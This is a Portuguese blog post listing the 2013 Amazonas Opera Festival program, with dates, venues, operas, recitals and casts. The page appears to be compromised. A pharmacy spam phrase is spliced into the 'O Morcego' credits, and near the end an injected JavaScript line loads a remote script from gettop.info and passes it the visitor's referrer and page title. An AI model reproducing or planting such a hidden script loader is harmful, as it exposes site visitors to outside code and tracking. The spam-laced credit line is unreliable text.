Escrito por em 21 mar 2013 nas áreas Amazonas, Festival, Lateral, Programação

Veja a programação liberada deste belo Festival.

O Festival Amazonas de Ópera tem:

– Direção Geral – Robério Braga
– Direção Artística – Luiz Fernando Malheiro
– Direção Artística Adjunta – Marcelo de Jesus

 

Dias 14 de abril, às 19h. e dias 18 e 20 de abril, às 20h.
Teatro Amazonas

KRÓL ROGER (REI ROGER) – Karol Szymanowski (ópera em concerto)
Opera em três atos – Música de Karol Szymanowski (1882-1937) – Libreto de Karol Szymanowski e Jaroslaw Iwazkiewicz

Personagens e intérpretes: Rei Roger – Marcin Bronikowski, barítono / Roxana – Olga Trifonova, soprano / Edrisi – Juremir Vieira, tenor / Pastor – José Luis Sola, tenor / Arcebispo – Pepes do Valle, baixo / Diaconisa – Denise de Freitas, contralto

CORAL INFANTIL DO LICEU DE ARTES E OFÍCIOS CLÁUDIO SANTORO – CORAL DO AMAZONAS – AMAZONAS FILARMÔNICA
Direção Musical e Regência: Luiz Fernando Malheiro

 

Dia 15 de Abril (Seg) – 18h.
Centro Cultural Palácio da Justiça

CONVIVÊNCIA DA ÓPERA – ESCOLA RUSSA DE CANTO com Olga Trifonova

 

Dias 16 e 29 de abril e 01 de maio, às 20h. e 21 de abril, às 19h.
Teatro Amazonas

UN BALLO IN MASCHERA (UM BAILE DE MÁSCARAS) – Giuseppe Verdi (ópera em concerto)
Melodrama em tres atos – Música de Giuseppe Verdi (1813 – 1901) – Criação: Roma, Teatro Apollo, 17 de Fevereiro de 1859 – Libreto de Antonio Somma

Personagens e intérpretes: Riccardo, conte di Warwich, governatore di Boston – Paulo Mandarino /Enrique Bravo, tenores / Renato, creolo, suo segretario e sposo di Amelia – Leonardo Páscoa, barítono / Amelia – Daniella Carvalho / Isabelle Sabrié, sopranos / Ulrica, indovina di razza nera – Andreia Souza / Kelly Cristina Fernandes, mezzo-sopranos / Oscar, paggio – Michele Menezes / Kátia Freitas, sopranos / Silvano, marinaio – Joubert Coelho, barítono / Samuel, nemico del conte – Murilo Neves, baixo / Tom, nemico de conte – Oscar Velazquez, baixo / Un Giudice / Un servo di Amelia -Carlos Alberto Corrêa, tenor

CORAL DO AMAZONAS – ORQUESTRA EXPERIMENTAL DA AMAZONAS FILARMÔNICA
Direção Musical e Regência: Luiz Fernando Malheiro

 

Dia 19 de Abril (Sex) – 20h.
Teatro da Instalação

RECITAL BRADESCO I – Canções de Benjamin Britten

Solistas: Daniella Carvalho / Denise de Freitas / Flávio Leite
Pianista: André dos Santos

 

Dia 22 de Abril (Seg) – 18h.
Centro Cultural Palácio da Justiça

CONVIVÊNCIA DA ÓPERA – COREOGRAFIA com Ruby Tagle, André Duarte / Monique Andrade

 

Dia 24 de Abril (Qua) – 20h.

Teatro da Instalação

RECITAL BRADESCO II – Canções de Giuseppe Verdi

Solistas:Andreia Souza / Juremir Vieira / Pepes do Valle
Pianista: Rafael Andrade

 

Dia 27 de Abril (Sáb) – 19h.
Centro de Convivência da Família Magdalena Arce Daou

VESPERAL LÍRICA BRADESCO – La Traviata – Giuseppe Verdi

Violetta Valéry – Carol Martins / Alfredo Germont – Cristhiano Silva / Giorgio Germont – Josenor Rocha / Flora Bervoix – Raquel Brasil / Annina – Regina Santiago / Gastone – Fabiano Cardoso / Barone Douphol – Joubert da Costa Coelho / Marchese d’Obigny – Ramakris Elessondres / Dottore Grenvil – Roberto Paulo / Giuseppe – Miqueias Oliveira / Servo de Flora – Isaac Braga – MADRIGAL DA CASA DE MÚSICA IVETE IBIAPINA

Cenários e Figurinos : Acervo da CTP – Direção Cênica: Elis Marinheiro – Direção Musical e Piano: Hilo Tiago

 

Dias 28 de Abril, às 17h. e dias 30 de abril e 02 de maio, às 19h.
Teatro Amazonas

AVENTURAS DA RAPOSA ASTUTA – Leos Janacek
Ópera em três atos – Música de Leos Janacek (1854-1928) – Libreto de Leos Janacek baseado em um conto de Rudolf Tesnohlídek – Criação: Teatro Nacional, Brno, em 6 de Novembro de 1924

Personagens e intérpretes: O caçador – Homero Velho, barítono / A raposa astuta – Maíra Lautert, soprano / O raposo – Denise de Freitas, mezzo-soprano / A mulher do caçador – Isabelle Sabrié, soprano / O professor / O pernilongo – Flávio Leite, tenor / O padre / O texugo – Pepes do Valle, baixo / Harashta, comerciante de aves – Murilo Neves, baixo / Lapák, cachorro – Aurean Elessondres, mezzo-soprano / Pásek, dono da taverna – Cleyton Pulzi, tenor / A senhora Pásek, mulher do dono da taverna – Dhijana Nobre, soprano / A coruja – Marinete Negrão, mezzo-soprano / O pica-pau – Tamar Freitas, soprano / A raposinha – Adriana Assenova Angelova, sopranino / Chico (Frantik) – Edilson Cardoso, sopranino / José (Pepik) – Mardem Judson, sopranino / O galo / O aracuã – Larissa Albuquerque, soprano / A galinha d’Angola – Patrícia Botelho, soprano / O grilo – Wendell Barbosa, sopranino / A cigarra – Barbara Garcia, sopranino / O sapinho – Mira Assenova Angelova, contralto – CORPO DE DANÇA DO AMAZONAS – AMAZONAS FILARMÔNICA

Direção Musical e Regência: Marcelo de Jesus – Direção Cênica: William Pereira – Cenários e Figurinos: Rosa Magalhães – Iluminação: Luiz Fernando – Coreografia: Monique Andrade

 

Dia 29 de Abril (Seg) – 18h.
Centro Cultural Palácio da Justiça

CONVIVÊNCIA DA ÓPERA – ÓPERA E CARNAVAL com Rosa Magalhães

 

Dia 01 de Maio (Qua) – 18h.
Centro Cultural Palácio da Justiça

CONVIVÊNCIA DA ÓPERA – PIANISTAS DE ÓPERA com Pianistas do XVII FAO

 

Dia 03 de Maio (Sex) – 22h.
Teatro da Instalação

RECITAL BRADESCO III

Solistas: Mirian Abad / Humberto Sobrinho / Homero Velho
MADRIGAL DA CASA DE MÚSICA IVETE IBIAPINA
Violino Elétrico – Barbara Soares e Adriana Vilekova – Bateria / Percussão – Andrio Dias – Piano – Marcelo de Jesus

God save the Queen / Somebody to love / Killer queen / Don’t stop me now / Save me / Crazy littlething called love / Play the game / Too much love will kill you / Love of my life / Another one bites the dust / We will rock you / We are the champions / A kind of magic / Radio ga ga / I want to break free / It’s a hard life / The show must go on / Who wants to live forever / You’re my best friend / Friends will be friends / Barcelona / How Can I Go On / Bohemian rhapsody

 

Dia 04 de Maio (Sáb) – 19h.
Centro de Convivência da Família Padre Vignola

VESPERAL LÍRICA BRADESCO – La Traviata – Giuseppe Verdi

Violetta Valéry – Carol Martins / Alfredo Germont – Cristhiano Silva / Giorgio Germont – Josenor Rocha / Flora Bervoix – Raquel Brasil / Annina – Regina Santiago / Gastone – Fabiano Cardoso / Barone Douphol – Joubert da Costa Coelho / Marchese d’Obigny – Ramakris Elessondres / Dottore Grenvil – Roberto Paulo / Giuseppe – Miqueias Oliveira / Servo de Flora – Isaac Braga – MADRIGAL DA CASA DE MÚSICA IVETE IBIAPINA

Cenários e Figurinos: Acervo da CTP – Direção Cênica: Elis Marinheiro – Direção Musical e Piano: Hilo Tiago

 

Dia 05 de Maio (Dom) – 19h.
Teatro da Instalação

CONCERTO BENJAMIN BRITTEN 100 ANOS (1913 -1976) – OCA

Sinfonia Simples Op.4

Serenata para Tenor, Trompas e Cordas Op.31
Solistas: José Luís Guede, trompa / Juremir Viera, tenor

As Iluminuras Op.18
Solista: Isabelle Sabrié

ORQUESTRA DE CÂMARA DO AMAZONAS
Direção Musical e Regência: Marcelo de Jesus

 

Dia 06 de Maio (Seg) – 18h.
Centro Cultural Palácio da Justiça

CONVIVÊNCIA DA ÓPERA – DIREÇÃO CÊNICA com Sérgio Vela

 

Dia 07 de Maio (Ter) – 20h.
Teatro da Instalação

RECITAL BRADESCO IV

Solistas: Jaiana Souza / Regina Santiago / Dhijana Nobre / Elane Monteiro / Meire Vieira / Kátia Freitas / Tamar Freitas / Raquel de Queiroz / Marinete Negrão / Lincoln Pires / Thelvana Freitas / Kelly Fernandes / Carolina Mendonça / Aurean Elessondres / Daniel Amos / Fabiano Cardoso / Roberto Paulo / Ramakris Elessondres / Rafael Lima / Emanuel Conde / Márcio Cruz

Professor Juremir Vieira
Pianista: Hilo Tiago

 

Dia 09 de Maio (Qui) – 20h.
Teatro da Instalação

RECITAL BRADESCO V – Canções Brasileiras

Solistas: Carol Martins / Tamar Freitas / Talita Azevedo / Fabiano Cardoso / Rafael Lima
Pianista: Paulo Henrique

 

Dia 11 de Maio (Sáb) – 19h.
Centro de Convivência do Idoso – Aparecida

VESPERAL LÍRICA BRADESCO – La Traviata – Giuseppe Verdi

Violetta Valéry – Carol Martins / Alfredo Germont – Cristhiano Silva / Giorgio Germont – Josenor Rocha / Flora Bervoix – Raquel Brasil / Annina – Regina Santiago / Gastone – Fabiano Cardoso / Barone Douphol – Joubert da Costa Coelho / Marchese d’Obigny – Ramakris Elessondres / Dottore Grenvil – Roberto Paulo / Giuseppe – Miqueias Oliveira / Servo de Flora – Isaac Braga – MADRIGAL DA CASA DE MÚSICA IVETE IBIAPINA

Cenários e Figurinos: Acervo da CTP – Direção Cênica: Elis Marinheiro – Direção Musical e Piano: Hilo Tiago

 

Dia 12 de Maio (Dom) – 11h.
Teatro da Instalação

CONCERTO DO DIA DAS MÃES – “Modinhas e Lundus”

ALUNOS DE TEATRO E DANÇA DO LICEU DE ARTES E OFÍCIO CLÁUDIO SANTORO
ORQUESTRA DE VIOLÕES DO AMAZONAS

Antônio da Silva Leite
Ausente, saudoso e triste / Eu nasci sem coração / Ganinha, minha ganinha / Lundu 11 / Lundu 12 / Xula carioca

Manuel de J. G.  Silva
Menina você vai hoje / Não pode a longa distância / Os desprezos de meu bem / Os me deixas que tu das / Se fores ao fim do mundo / Vidinha adeus / Homens errados e loucos / Quem achou o q’eu achei / A Lyra do trovão

Henrique Albertazzi
Echos no mar

Augusto Canseron
Brazil, ó minha pátria

Cândido Dias da Silva
Morrer sim, deixarte não

 

Dia 15 de Maio (Qua) – 20h.
Teatro da Instalação

RECITAL BRADESCO VI

ALUNOS DO MADRIGAL DA CASA DE MÚSICA IVETE IBIAPINA
Professora Natalia Sakouro
Pianista: Marcelo de Jesus

 

Dias 16 e 22 de Maio, às 18h. e 19 de maio, às 17h.
Teatro Amazonas

PARSIFAL – Richard Wagner
Ein Bühnenmeihfestspiel (Uma peça festiva de Consagração) de Richard Wagner (1813-1883)

Personagens e Intérpretes: Amfortas – Noé Colin, baixo-barítono / Titurel – Pepes do Valle, baixo / Gurnemanz – Diógenes Randes, baixo / Parsifal – Michael Hendrick, tenor / Klingsor – Oscar Velazquez, baixo / Kundry – Olga Sergeyeva, soprano / 1º Cavaleiro do Graal – Enrique Bravo, tenor / 2º Cavaleiro do Graal – Rafael Lima, barítono / 1º Escudeiro – Michele Menezes, soprano / 2º Escudeiro – Denise de Freitas, contralto / 3º Escudeiro – Flávio Leite, tenor / 4º Escudeiro – Cleyton Pulzi, tenor
Grupo I: 1ª Donzela – Maíra Lautert, soprano / 2ª Donzela – Michele Menezes, soprano / 3ª Donzela – Andreia Souza, mezzo-soprano
Grupo II: 1ª Donzela – Isabelle Sabrié, soprano / 2ª Donzela – Elane Monteiro, soprano / 3ª Donzela – Denise de Freitas, soprano / Voz do Alto – Olga Sergeyeva, contralto

CORPO DE DANÇA DO AMAZONAS – CORAL DO AMAZONAS – AMAZONAS FILARMÔNICA

Direção Musical e Regência: Luiz Fernando Malheiro – Direção Cênica e Cenografia: Sérgio Vela – Figurinos: Violeta Rojas – Coreografia: Ruby Tagle – Iluminação: Sérgio Vela – Colaboração de Cenografia e Iluminação: Ivan Cervantes – Bolsista do Fundo Nacional para a Cultura e as Artes na Companhia Nacional de Teatro do México.

 

Dia 18 de Maio (Sáb) – 19h.
Teatro da Instalação

VESPERAL LÍRICA BRADESCO – La Traviata – Giuseppe Verdi

Violetta Valéry – Carol Martins / Alfredo Germont – Cristhiano Silva / Giorgio Germont – Josenor Rocha / Flora Bervoix – Raquel Brasil / Annina – Regina Santiago / Gastone – Fabiano Cardoso / Barone Douphol – Joubert da Costa Coelho / Marchese d’Obigny – Ramakris Elessondres / Dottore Grenvil – Roberto Paulo / Giuseppe – Miqueias Oliveira / Servo de Flora – Isaac Braga – MADRIGAL DA CASA DE MÚSICA IVETE IBIAPINA

Cenários e Figurinos: Acervo da CTP – Direção Cênica: Elis Marinheiro – Direção Musical e Piano: Hilo Tiago

 

Dia 20 de Maio (Seg) – 18h.
Centro Cultural Palácio da Justiça

CONVIVÊNCIA DA ÓPERA – CANTO com Michael Hendrick

 

Dia 21 de Maio (Ter) – 20h.
Teatro da Instalação

RECITAL BRADESCO VII – Richard Wagner – Sua influência e seu legado

Solista: Oscar Velasquez
Pianista: André dos Santos

ADELAIDE – L. V. Beethoven (1770 – 1827) / UNBEFANGENHEIT – C. M. von Weber (1786 – 1826) / LE POETE MOURANT – G. Meyeerber (1791 – 1864) / O QUAND JE DORS – F. Liszt (1811 – 1886), Mignonne, L´Attente, Dors Mon Enfant, Tous N´Est Qu´Images Fugitives, Wagner (1813 – 1883) / DER TANNENBAUM – R. Wagner (1813 – 1883) / NOCTURNE – C. Frank (1822 – 1890) / EXTASE – H. Duparc (1848 – 1923) / VIER LIEDER OP. 27 – Ruhe, meine Seele!, Cäcilie, Heimliche Aufforderung, Morgen R. Strauss (1864 -1949)

 

Dia 26 de Maio (Dom) – 19h.
Centro Cultural Largo de São Sebastião

O MORCEGO – Johann Strauss Filho
Opereta em três atos – Música de Johann Strauss Filho (1825-1899) – Libreto de Karl Haffner e Richard Genée, baseado em Le Réveillon de Henri Meilhac e Ludovic Halévy – Criação: Theater an der Wien, Viena, em 5 de Abril de 1874

Personagens e Intérpretes: Rosalinde – Mirian Abad, soprano / Gabriel von Eisenstein Enrique Bravo, tenor / Adele – Dhijana Nobre, soprano / Príncipe Orlofsky – Aurean Elessondres, mezzo-soprano / Alfred – Cleyton Pulzi, tenor / Dr. Falke – Ramakris Elessondres, barítono / Frank – Roberto Paulo, baixo / Dr. Blind – Fabiano Cardoso, tenor / Ida – Carol Martins, soprano / Frosch – Paulo Queiroz, ator / Ivan – Roger Barbosa, ator

CORPO DE DANÇA DO AMAZONAS – CORAL DO AMAZONAS – ORQUESTRA EXPERIMENTAL DA AMAZONAS FILARMÔNICA

Direção Musical e Regência: Marcelo where to buy cialis online safely 164 de Jesus / Otávio Simões – Direção Cênica, tradução e adaptação dos diálogos: Malu Gurgel e Julianna Santos – Figurinos / Cenários: Central Técnica de Produção – Coreografia: André Duarte Iluminação: Luiz Fernando – Criação e orquestração do “Morcego Mix”: Miguel Briamonte

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

Faça seu comentário